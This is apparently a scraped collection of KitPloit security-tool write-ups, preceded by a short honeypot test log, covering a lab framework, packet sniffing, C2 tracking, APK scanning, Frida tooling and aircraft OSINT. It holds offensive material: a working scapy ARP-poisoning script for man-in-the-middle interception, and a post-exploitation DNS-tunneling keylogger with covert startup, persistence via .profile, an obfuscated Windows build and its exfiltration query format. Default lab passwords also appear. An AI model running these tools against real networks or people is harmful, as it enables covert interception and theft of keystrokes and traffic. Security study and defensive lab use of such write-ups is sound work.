Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

CSAF - Cyber Security Awareness Framework

By: Zion3R β€” April 26th 2024 at 12:30

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational materials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.


Requirements

Software

  • Docker
  • Docker-compose

Hardware

Minimum

  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free

Recommendation

  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above

Installation

Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reasons, you should first set environment variables like this:

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific labs with the following profiles:

  • all
  • attackdefenselab
  • phisinglab
  • breachlab
  • soclab

For example

docker-compose --profile=attackdefenselab up -d

Proof



Exposed Ports

An exposed port can be accessed using a SOCKS5 proxy client, an SSH client, or an HTTP client. Choose whichever gives the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080 http://10.0.0.100/vnc.html
  • curl --proxy socks5://ipaddress:7080 http://10.0.1.101/vnc.html
  • curl --proxy socks5://ipaddress:8080 http://10.0.3.102/vnc.html

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://mail.server.lab/ (default username: postmaster@server.lab, default password: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: postmaster@server.lab, default password: mailpassword)
  • http://phising.lab/
  • http://10.0.0.200:8081/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default password: password)
  • http://dvwa-monitor.lab/ (default username: admin, default password: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default password: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default password: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default password: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: admin@purpleops.com, default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address

Attack

  • 10.0.0.100 attack.lab
  • 10.0.0.200 phising.lab
  • 10.0.0.201 server.lab
  • 10.0.0.201 mail.server.lab
  • 10.0.0.202 gophish.lab
  • 10.0.0.110 infectionmonkey.lab
  • 10.0.0.111 mongodb.lab
  • 10.0.0.112 purpleops.lab
  • 10.0.0.113 caldera.lab

Defense

  • 10.0.1.101 defense.lab
  • 10.0.1.10 dvwa.lab
  • 10.0.1.13 wackopicko.lab
  • 10.0.1.14 juiceshop.lab
  • 10.0.1.20 gitea.lab
  • 10.0.1.110 infectionmonkey.lab
  • 10.0.1.112 purpleops.lab
  • 10.0.1.113 caldera.lab

Monitor

  • 10.0.3.201 server.lab
  • 10.0.3.201 mail.server.lab
  • 10.0.3.9 mariadb.lab
  • 10.0.3.10 dvwa.lab
  • 10.0.3.11 dvwa-monitor.lab
  • 10.0.3.12 dvwa-modsecurity.lab
  • 10.0.3.102 monitor.lab
  • 10.0.3.30 wazuh-manager.lab
  • 10.0.3.31 wazuh-indexer.lab
  • 10.0.3.32 wazuh-dashboard.lab
  • 10.0.3.40 splunk.lab

Public

  • 10.0.2.101 defense.lab
  • 10.0.2.13 wackopicko.lab

Internet

  • 10.0.4.102 monitor.lab
  • 10.0.4.30 wazuh-manager.lab
  • 10.0.4.32 wazuh-dashboard.lab
  • 10.0.4.40 splunk.lab

Internal

  • 10.0.5.100 attack.lab
  • 10.0.5.12 dvwa-modsecurity.lab
  • 10.0.5.13 wackopicko.lab

License

This Docker Compose application is released under the MIT License. See the LICENSE file for details.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Espionage - A Linux Packet Sniffing Suite For Automated MiTM Attacks

By: Zion3R β€” April 25th 2024 at 12:30

Espionage is a network packet sniffer that intercepts large amounts of data being passed through an interface. The tool allows users to run normal and verbose traffic analysis that shows a live feed of traffic, revealing packet direction, protocols, flags, etc. Espionage can also spoof ARP so that all data sent by the target gets redirected through the attacker (MiTM). Espionage supports IPv4, TCP/UDP, ICMP, and HTTP. Espionage was written in Python 3.8 but it also supports version 3.6. This is the first version of the tool, so please contact the developer if you want to help contribute and add more to Espionage. Note: This is not a Scapy wrapper; scapylib only assists with HTTP requests and ARP.


Installation

1: git clone https://www.github.com/josh0xA/Espionage.git
2: cd Espionage
3: sudo python3 -m pip install -r requirments.txt
4: sudo python3 espionage.py --help

Usage

  1. sudo python3 espionage.py --normal --iface wlan0 -f capture_output.pcap
    Command 1 will execute a clean packet sniff and save the output to the pcap file provided. Replace wlan0 with whatever your network interface is.
  2. sudo python3 espionage.py --verbose --iface wlan0 -f capture_output.pcap
    Command 2 will execute a more detailed (verbose) packet sniff and save the output to the pcap file provided.
  3. sudo python3 espionage.py --normal --iface wlan0
    Command 3 will still execute a clean packet sniff; however, it will not save the data to a pcap file. Saving the sniff is recommended.
  4. sudo python3 espionage.py --verbose --httpraw --iface wlan0
    Command 4 will execute a verbose packet sniff and will also show raw http/tcp packet data in bytes.
  5. sudo python3 espionage.py --target <target-ip-address> --iface wlan0
    Command 5 will ARP spoof the target IP address so that all data being sent is routed back to the attacker's machine (you/localhost); a minimal sketch of this technique appears after this list.
  6. sudo python3 espionage.py --iface wlan0 --onlyhttp
    Command 6 will only display sniffed packets on port 80 utilizing the HTTP protocol.
  7. sudo python3 espionage.py --iface wlan0 --onlyhttpsecure
    Command 7 will only display sniffed packets on port 443 utilizing the HTTPS (secured) protocol.
  8. sudo python3 espionage.py --iface wlan0 --urlonly
    Command 8 will only sniff and return URLs visited by the victim (works best with sslstrip).

  9. Press Ctrl+C in order to stop the packet interception and write the output to file.
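
For illustration, here is a minimal scapy-based sketch of the ARP-poisoning step behind command 5. It is not Espionage's implementation; the IP addresses are hypothetical and the script must run as root:

# pip install scapy; run as root
import time
from scapy.all import ARP, send

TARGET_IP = "192.168.1.50"  # hypothetical victim
GATEWAY_IP = "192.168.1.1"  # hypothetical gateway

def poison(target_ip: str, spoof_ip: str) -> None:
    # op=2 is an ARP reply; it tells target_ip that our MAC address
    # (scapy fills in hwsrc automatically) now owns spoof_ip.
    send(ARP(op=2, pdst=target_ip, psrc=spoof_ip), verbose=False)

while True:
    poison(TARGET_IP, GATEWAY_IP)  # victim sends gateway-bound traffic to us
    poison(GATEWAY_IP, TARGET_IP)  # gateway sends victim-bound traffic to us
    time.sleep(2)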

Menu

usage: espionage.py [-h] [--version] [-n] [-v] [-url] [-o] [-ohs] [-hr] [-f FILENAME] -i IFACE
[-t TARGET]

optional arguments:
-h, --help show this help message and exit
--version returns the packet sniffers version.
-n, --normal executes a cleaner interception, less sophisticated.
-v, --verbose (recommended) executes a more in-depth packet interception/sniff.
-url, --urlonly only sniffs visited urls using http/https.
-o, --onlyhttp sniffs only tcp/http data, returns urls visited.
-ohs, --onlyhttpsecure
sniffs only https data, (port 443).
-hr, --httpraw displays raw packet data (byte order) recieved or sent on port 80.

(Recommended) arguments for data output (.pcap):
-f FILENAME, --filename FILENAME
name of file to store the output (make extension '.pcap').

(Required) arguments required for execution:
-i IFACE, --iface IFACE
specify network interface (ie. wlan0, eth0, wlan1, etc.)

(ARP Spoofing) required arguments in-order to use the ARP Spoofing utility:
-t TARGET, --target TARGET


Writeup

A simple medium writeup can be found here:
Click Here For The Official Medium Article

Ethical Notice

The developer of this program, Josh Schiavone, wrote the following code for educational and ethical purposes only. The data sniffed/intercepted is not to be used for malicious intent. Josh Schiavone is not responsible or liable for misuse of this penetration testing tool. May God bless you all.

License

MIT License
Copyright (c) 2024 Josh Schiavone




☐ β˜† βœ‡ KitPloit - PenTest Tools!

C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

By: Zion3R β€” April 24th 2024 at 02:23


Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

The feed should update daily. I'm actively working on making the backend more reliable.


Honorable Mentions

Many of the Shodan queries have been sourced from other CTI researchers:

Huge shoutout to them!

Thanks to BertJanCyber for creating the KQL query for ingesting this feed

And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

What do I track?

Running Locally

If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
bash
python3 -m pip install -r requirements.txt
python3 tracker.py
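
For reference, a minimal sketch of what a Shodan-based collector like this boils down to. The query is a hypothetical example and the code is not the project's actual implementation; it only mirrors the SHODAN_API_KEY variable and the all.txt convention described above:

# pip install shodan
import os
import shodan

api = shodan.Shodan(os.environ["SHODAN_API_KEY"])
QUERY = 'product:"Cobalt Strike Beacon"'  # hypothetical example query

results = api.search(QUERY)
ips = sorted({match["ip_str"] for match in results["matches"]})
with open("all.txt", "w") as f:
    f.write("\n".join(ips))
print(f"{len(ips)} IPs collected")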

Contributing

I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted; just know that fidelity is paramount (a high true/false positive ratio is the focus).

References



☐ β˜† βœ‡ KitPloit - PenTest Tools!

APKDeepLens - Android Security Insights In Full Spectrum

By: Zion3R β€” April 11th 2024 at 12:30


APKDeepLens is a Python based tool designed to scan Android applications (APK files) for security vulnerabilities. It specifically targets the OWASP Top 10 mobile vulnerabilities, providing an easy and efficient way for developers, penetration testers, and security researchers to assess the security posture of Android apps.


Features

APKDeepLens is a Python-based tool that performs various operations on APK files. Its main features include:

  • APK Analysis -> Scans Android application package (APK) files for security vulnerabilities.
  • OWASP Coverage -> Covers OWASP Top 10 vulnerabilities to ensure a comprehensive security assessment.
  • Advanced Detection -> Utilizes custom Python code for APK file analysis and vulnerability detection.
  • Sensitive Information Extraction -> Identifies potential security risks by extracting sensitive information from APK files, such as insecure authentication/authorization keys and insecure request protocols.
  • In-depth Analysis -> Detects insecure data storage practices, including data related to the SD card, and highlights the use of insecure request protocols in the code.
  • Intent Filter Exploits -> Pinpoints vulnerabilities by analyzing intent filters extracted from AndroidManifest.xml (see the sketch after this list).
  • Local File Vulnerability Detection -> Safeguards your app by identifying potential mishandling of local file operations.
  • Report Generation -> Generates detailed and easy-to-understand reports for each scanned APK, providing actionable insights for developers.
  • CI/CD Integration -> Designed for easy integration into CI/CD pipelines, enabling automated security testing in development workflows.
  • User-Friendly Interface -> Color-coded terminal outputs make it easy to distinguish between different types of findings.
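
As a rough sketch of the intent-filter analysis idea (not APKDeepLens' actual logic), the snippet below walks an AndroidManifest.xml and flags components that look exported. It assumes the manifest has already been decoded to plain XML (e.g. with apktool), since the manifest inside an APK is binary XML:

import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
tree = ET.parse("AndroidManifest.xml")  # a decoded, plain-text manifest

for component in tree.iter():
    if component.tag not in ("activity", "service", "receiver"):
        continue
    exported = component.get(f"{ANDROID_NS}exported")
    has_filter = component.find("intent-filter") is not None
    # A component with an intent-filter is exported by default unless
    # android:exported="false" is set explicitly.
    if has_filter and exported != "false":
        print("potentially exposed:", component.get(f"{ANDROID_NS}name"))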

Installation

To use APKDeepLens, you'll need to have Python 3.8 or higher installed on your system. You can then install APKDeepLens using the following command:

For Linux

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python APKDeepLens.py --help

For Windows

git clone https://github.com/d78ui98/APKDeepLens
cd APKDeepLens
python3 -m venv venv
.\venv\Scripts\activate
pip install -r .\requirements.txt
python APKDeepLens.py --help

Usage

To simply scan an APK, use the command below, specifying the APK file with the -apk argument. Once the scan is complete, a detailed report is displayed in the console.

python3 APKDeepLens.py -apk file.apk

If you've already extracted the source code and want to provide its path for a faster scan, use the command below, specifying the Android application's source code with the -source parameter.

python3 APKDeepLens.py -apk file.apk -source <source-code-path>

To generate detailed PDF and HTML reports after the scan, pass the -report argument as shown below.

python3 APKDeepLens.py -apk file.apk -report

Contributing

We welcome contributions to the APKDeepLens project. If you have a feature request, bug report, or proposal, please open a new issue here.

For those interested in contributing code, please follow the standard GitHub process. We'll review your contributions as quickly as possible :)

Featured at



☐ β˜† βœ‡ KitPloit - PenTest Tools!

R2Frida - Radare2 And Frida Better Together

By: Zion3R β€” March 30th 2024 at 11:30


This is a self-contained plugin for radare2 that allows you to instrument remote processes using Frida.

The radare project provides a complete toolchain for reverse engineering, with well-maintained functionality that can be extended with other programming languages and tools.

Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


Features

  • Run unmodified Frida scripts (Use the :. command)
  • Execute snippets in C, JavaScript or TypeScript in any process
  • Can attach, spawn or launch in local or remote systems
  • List sections, symbols, exports, protocols, classes, methods
  • Search for values in memory inside the agent or from the host
  • Replace method implementations or create hooks with short commands
  • Load libraries and frameworks in the target process
  • Support Dalvik, Java, ObjC, Swift and C interfaces
  • Manipulate file descriptors and environment variables
  • Send signals to the process, continue, breakpoints
  • The r2frida io plugin is also a filesystem fs and debug backend
  • Automate r2 and frida using r2pipe
  • Read/Write process memory
  • Call functions, syscalls and raw code snippets
  • Connect to frida-server via usb or tcp/ip
  • Enumerate apps and processes
  • Trace registers, arguments of functions
  • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
  • Doesn't require frida to be installed in the host (no need for frida-tools)
  • Extend the r2frida commands with plugins that run in the agent
  • Change page permissions, patch code and data
  • Resolve symbols by name or address and import them as flags into r2
  • Run r2 commands in the host from the agent
  • Use r2 apis and run r2 commands inside the remote target process.
  • Native breakpoints using the :db api
  • Access remote filesystems using the r_fs api.

Installation

The recommended way to install r2frida is via r2pm:

$ r2pm -ci r2frida

Binary builds that don't require compilation will soon be supported in r2pm and r2env. Meanwhile, feel free to download the latest builds from the Releases page.

Compilation

Dependencies

  • radare2
  • pkg-config (not required on windows)
  • curl or wget
  • make, gcc
  • npm, nodejs (will soon be removed)

In GNU/Debian you will need to install the following packages:

$ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

Instructions

$ git clone https://github.com/nowsecure/r2frida.git
$ cd r2frida
$ make
$ make user-install

Windows

  • Install meson and Visual Studio
  • Unzip the latest radare2 release zip in the r2frida root directory
  • Rename it to radare2 (instead of radare2-x.y.z)
  • Run preconfigure.bat to make the VS compiler available in PATH
  • Run configure.bat and then make.bat
  • Copy b\r2frida.dll into the directory shown by r2 -H R2_USER_PLUGINS

Usage

For testing, use r2 frida://0; attaching to PID 0 in Frida is a special session that runs locally. Now you can run the :? command to get the list of available commands.

$ r2 'frida://?'
r2 frida://[action]/[link]/[device]/[target]
* action = list | apps | attach | spawn | launch
* link = local | usb | remote host:port
* device = '' | host:port | device-id
* target = pid | appname | process-name | program-in-path | abspath
Local:
* frida://? # show this help
* frida:// # list local processes
* frida://0 # attach to frida-helper (no spawn needed)
* frida:///usr/local/bin/rax2 # abspath to spawn
* frida://rax2 # same as above, considering local/bin is in PATH
* frida://spawn/$(program) # spawn a new process in the current system
* frida://attach/(target) # attach to target PID in current host
USB:
* frida://list/usb// # list processes in the first usb device
* frida://apps/usb// # list apps in the first usb device
* frida://attach/usb//12345 # attach to given pid in the first usb device
* frida://spawn/usb//appname # spawn an app in the first resolved usb device
* frida://launch/usb//appname # spawn+resume an app in the first usb device
Remote:
* frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
Environment: (Use the `%` command to change the environment at runtime)
R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

Examples

$ r2 frida://0     # same as frida -p 0, connects to a local session

You can attach, spawn, or launch any program by name or PID. The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this):

$ r2 frida://rax2  # attach to the first process named `rax2`
$ r2 frida://1234 # attach to the given pid

Using the absolute path of a binary to spawn will spawn the process:

$ r2 frida:///bin/ls
[0x00000000]> :dc # continue the execution of the target program

Also works with arguments:

$ r2 frida://"/bin/ls -al"

For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

$ r2 frida://spawn/usb/         # enumerate devices
$ r2 frida://spawn/usb// # enumerate apps in the first iOS device
$ r2 frida://spawn/usb//Weather # Run the weather app

Commands

These are the most frequent commands; learn them, and suffix them with ? to get subcommand help.

:i        # get information of the target (pid, name, home, arch, bits, ..)
.:i* # import the target process details into local r2
:? # show all the available commands
:dm # list maps. Use ':dm|head' and seek to the program base address
:iE # list the exports of the current binary (seek)
:dt fread # trace the 'fread' function
:dt-* # delete all traces

Plugins

r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

See the plugins/ directory for some more example plugin scripts.

[0x00000000]> cat example.js
r2frida.pluginRegister('test', function(name) {
  if (name === 'test') {
    return function(args) {
      console.log('Hello Args From r2frida plugin', args);
      return 'Things Happen';
    }
  }
});
[0x00000000]> :. example.js # load the plugin script

The :. command works like r2's . command, but runs inside the agent.

:. a.js  # run script which registers a plugin
:. # list plugins
:.-test # unload a plugin by name
:.. a.js # eternalize script (keeps running after detach)

Termux

If you want to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of symbol resolution issues. The way to make this work is by extending the LD_LIBRARY_PATH environment variable to point to the system directory before the Termux libdir.

$ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

Troubleshooting

Ensure you are using a modern version of r2 (preferably the latest release or git).

Run r2 -L | grep frida to verify that the plugin is loaded; if nothing is printed, use the R2_DEBUG=1 environment variable to get some debugging messages and find out the reason.

If you have problems compiling r2frida, you can use r2env or fetch the release builds from the GitHub releases page. Bear in mind that only the MAJOR.MINOR version must match; that is, r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

Design

+----------+
| radare2  |   The radare2 tool, on top of the rest
+----------+
     :
+----------+
| io_frida |   r2frida io plugin
+----------+
     :
+----------+
|  frida   |   Frida host APIs and logic to interact with target
+----------+
     :
+----------+
|   app    |   Target process instrumented by Frida with JavaScript
+----------+

Credits

This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

I would like to thank Ole AndrΓ© for writing and maintaining Frida, as well as being so kind as to proactively fix bugs and discuss technical details on anything needed to make this union work. Kudos!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Noia - Simple Mobile Applications Sandbox File Browser Tool

By: Zion3R β€” March 27th 2024 at 11:30


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications' sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, open an issue if you find any problems. PRs are welcome.


Installation & Usage

npm install -g noia
noia

Features

  • Explore third-party applications' files and directories. Noia shows you details including access permissions, file type, and much more.

  • View custom binary files. Directly preview SQLite databases, images, and more.

  • Search application by name.

  • Search files and directories by name.

  • Navigate to a custom directory using the ctrl+g shortcut.

  • Download the application files and directories for further analysis.

  • Basic iOS support

and more


Setup

Desktop requirements:

  • node.js LTS and npm
  • Any decent modern desktop browser

Noia is available on npm, so just type the following command to install it and run it:

npm install -g noia
noia

Device setup:

Noia is powered by frida.re, thus requires Frida to run.

Rooted Device

See:

  • https://frida.re/docs/android/
  • https://frida.re/docs/ios/

Non-rooted Device

  • https://koz.io/using-frida-on-android-without-root/
  • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
  • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

Security Warning

This tool is not secure and may itself contain security vulnerabilities, so make sure to isolate the web page from untrusted access.

LICENCE

MIT



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

By: Zion3R β€” March 22nd 2024 at 11:30

About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject β€” in this case planes!

Aircraft Information

  • Tail Number πŸ›«
  • Aircraft Type βš™οΈ
  • ICAO24 Designation πŸ”Ž
  • Manufacturer Details πŸ› 
  • Flight Logs πŸ“„
  • Aircraft Owner ✈️
  • Model πŸ›©
  • Much more!

Usage

To run skytrack on your machine, follow the steps below:

$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py

skytrack works best for Python version 3.

Preview

Features

skytrack features three main functions for aircraft information gathering and display options. They include the following:

Aircraft Reconnaissance & OSINT

skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be titled "skytrack_report.pdf".

Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting from one format to the other can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

Further Explanation

ICAO and Tail Numbers follow a mapping system like the following:

ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA

You can learn more about aircraft registration numbers here: https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers

:warning: Converter only works for USA-registered aircraft

Data Sources & APIs Used

ICAO Aircraft Type Designators Listings

FlightAware

Wikipedia

Aviation Safety Website

Jet Photos Website

OpenSky API

Aviation Weather METAR

Airport Codes Dataset

Contributing

skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

Upcoming

  • Obtain Latest Flown Airports
  • Obtain Airport Information
  • Obtain ATC Frequency Information

Support

If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

To check out my other works, visit my GitHub profile.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

By: Zion3R β€” March 21st 2024 at 11:30


This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties that help them avoid detection. The keylogger uses DNS tunneling/exfiltration to bypass firewalls and avoid detection.


Server

Setup

The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3 main.py

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:
ip
domain

options:
-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.

Registrar

On the registrar, you want to change your domain's nameservers to custom DNS.

Point them to two domains, ns1.example.com and ns2.example.com.

Add records that point the nameserver domains to your exfiltration server's IP address.

This is the same as setting glue records.

Client

Linux

The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

logger.sh

# Usage: logger.sh [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start on every new interactive shell.

connection.sh

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
Options:
-n: number of characters to store before sending a packet

Windows

Build

To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production domain=example.com

You can also choose to build the program with debugging by making the debug target.

make debug domain=example.com

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.

Replace example.com with the domain the server is listening for.

Protocol

Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.
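
A small sketch that builds query names in the two formats above. Only the a./b. name layouts and the ASCII-hex encoding come from this protocol description; the 60-character chunk size and the packet numbering scheme are assumptions for illustration:

def connect_name(domain: str) -> str:
    # a.1.1.1.[sld].[tld] opens a "connection"
    return f"a.1.1.1.{domain}"

def data_names(message: str, client_id: int, domain: str) -> list:
    hex_data = message.encode("ascii").hex().upper()
    # DNS labels max out at 63 bytes, so long payloads are split into
    # one b.[packet #].[id].[data] query per chunk.
    chunks = [hex_data[i:i + 60] for i in range(0, len(hex_data), 60)]
    return [f"b.{n + 1}.{client_id}.{chunk}.{domain}"
            for n, chunk in enumerate(chunks)]

print(connect_name("example.com"))  # a.1.1.1.example.com
for name in data_names("The quick brown fox.", client_id=1, domain="example.com"):
    print(name)  # b.1.1.5468...2E.example.com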

